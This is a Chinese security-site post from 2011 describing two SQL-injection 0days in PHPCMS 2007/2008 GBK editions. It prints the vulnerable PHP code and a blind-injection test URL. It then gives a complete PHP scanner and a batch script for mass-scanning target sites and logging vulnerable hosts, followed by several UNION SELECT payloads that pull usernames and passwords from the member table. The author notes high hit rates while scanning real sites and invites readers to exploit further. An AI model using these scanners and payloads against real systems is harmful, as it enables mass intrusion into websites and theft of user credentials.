首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
phpcms2008-0day & phpcms 2007 GBK版0day注射扫描脚本
来源:vfocus.net 作者:vfocus 发布时间:2011-07-27  

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php
code:
<?php 
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else 
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val) 
{
$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试方法:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
 
==================================
 
phpcms 2007 GBK版0day注射扫描脚本
 
作者:TheLostMind
 
本来比较忙,想整个站,发现这个0DAY还是很好的,写了个脚本自动扫描存在了漏洞的站点,至于说自动注射出帐号密码,还是不要了,不装X了。
 
网上看了下,貌似是零客网安0.S.T的“小蟑螂”大哥发现的~~
 
漏洞产生在member/member.php的第4行,代码如下:
 
.............. 
$m = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m , ".TABLE_MEMBER_INFO." i WHERE m.userid=i.userid AND m.username='$username' ","CACHE",86400); 
..............
 
username变量未经过过滤就进入查询了,我们在其包含的include/common.inc.php文件中有如下代码:
 
................ 
@extract($_POST, EXTR_OVERWRITE); 
@extract($_GET, EXTR_OVERWRITE); 
...............
 
呵呵,开始注射吧!由于变量有单引号“'”,所以我们要用一种方法去绕过这个限制,具体各位可以参考80sec的文章: 
http://www.80sec.com/php-coder-class-security-alert.html
 
修改了下鬼仔的那个东西,直接那来用了,装X,哈哈……
 
=================scanbug.php==========================================
 
<?
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
PHPcms SODB-2008-13 Exp 
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}
 
function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
 
$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
//$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo "Error... check the path!\r\n\r\n"; die;}
/*get   $prefix*/
$packet ="GET ".$path."member/member.php?username=tlm%cf' HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
//$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
echo "\n\n正在测试站点: $host ……\n";
if (eregi("in your SQL syntax",$html))
{
$temp=explode("FROM ",$html);
if(isset($temp[1])){$temp2=explode(" ",$temp[1]);}
if ($temp2[0]){
$prefix=$temp2[0];
echo "数据库为: ".$prefix."\r\n";
echo "当前站点发现漏洞,请手工检测...\r\n";
}
$filename = "php0day.txt";
$handle   = fopen ($filename,"a+"); 
if (!is_writable ($filename)){ 
die ("文件:".$filename."不可写,请检查其属性后重试!");
}
if (!fwrite ($handle,"\n存在漏洞的站点\t$host")){ 
die ("生成文件".$filename."失败!");
fwrite($handle,"\r\n");
fwrite($handle,"当前站点数据库\t");
fwrite($handle,$prefix);
 
fwrite($handle,"\r\n");
print_r('内容已经写入文件!');
fclose ($handle); //关闭指针
}
else 
exit("没漏洞哦……\n");
 
?>
 
===================================END==========================================
 
脚本文件就更简单了:
 
===================================scan.bat=======================================
 
@echo off
title PHPcms PHPcms 0DAY自动注射程序工作中……
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (php.txt) do D:\PHPnow-1.4.5-20\php-5.2.6-
 
Win32\php.exe 0dayhpcms.php %%i /
pause
 
====================================end==========================================
 
貌似存在这个漏洞的站点很多啊,随便扫了一下,命中率相当高,呵呵~
 
至于查询密码,就用NUNION吧,网上找了个工具抓了下包,貌似是不同版本的字段数不一样
 
==============================================
 
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
 
33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,
 
63,64,65/**/from/**/phpcms_member/**/where/**/userid=1
 
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
 
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,
 
61,62/**/from/**/phpcms_member/**/where/**/userid=1/*
 
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,username,password,52,53,54,55,56,
 
57/**/from/**/phpcms_member/**/where/**/userid=1/*
 
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
 
29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,
 
53,54,55,56,57,58/**/from/**/phpcms_member/**/where/**/userid=1/*
 
=======================================
 
替换其中的数据库名就可以了,数据库名已经扫描出来了,有利用工具,自己发挥吧……

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·114啦网址导航留言本注入漏洞
·科讯 6.x – 7.06 SQL 注射漏洞
·YothCMS 遍历目录漏洞
·牛牛CMS中小企业网站管理系统 上
·乌邦图企业网站系统 cookies 注
·智有道专业旅游系统 v1.0 注入及
·养生馆建站系统多处漏洞
·玉叶随风企业建站系统多处漏洞
·DEDECMS爆严重安全漏洞 免账号密
·深喉cms文件包含漏洞致使数据库
·DEDECMS拿SHELL EXP
·WordPress 严重的远程备份执行代
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved